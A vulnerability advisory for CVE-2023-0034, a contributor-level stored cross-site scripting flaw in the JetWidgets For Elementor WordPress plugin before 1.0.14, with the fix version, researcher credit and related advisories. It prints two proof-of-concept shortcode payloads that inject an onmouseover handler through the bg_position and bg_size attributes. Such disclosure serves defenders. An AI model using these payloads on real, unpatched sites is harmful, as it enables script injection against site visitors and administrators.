JetWidgets For Elementor < 1.0.14 – Contributor+ Stored XSS via Shortcode | CVE 2023-0034 | Plugin Vulnerabilities

Description

The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks

Proof of Concept

[jw-posts show_image='yes' show_image_as='background' bg_position='" onmouseover="alert(/XSS/)"']

[jw-posts show_image='yes' show_image_as='background' bg_size='"onmouseover="alert(/XSS/)//']

Note: For the exploit, at least one of the posts must have a thumbnail image.

Affects Plugins

jetwidgets-for-elementor

Fixed in 1.0.14

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website

https://lana.codes/

Submitter twitter

Verified

Yes

WPVDB ID

ffbdb8a1-19c3-45e9-81b0-ad47a0791c4a

Timeline

Publicly Published

2022-12-21 (about 1 years ago)

Added

2023-01-18 (about 1 years ago)

Last Updated

2023-03-06 (about 1 years ago)

Other

Published

Title

Published

2024-02-19

Title

ProfilePress < 4.15.0 - Contributor+ Stored XSS

Published

2024-03-25

Title

Conversios.io < 7.0.0 - Reflected Cross-Site Scripting

Published

2016-02-22

Title

All In One WP Security And Firewall < 4.0.5 - XSS

Published

2023-04-19

Title

Continuous announcement scroller <= 13.0 - Admin+ Stored XSS

Published

2022-01-24

Title

Anti-Malware Security and Brute-Force Firewall < 4.20.94 - Admin+ Reflected Cross-Site Scripting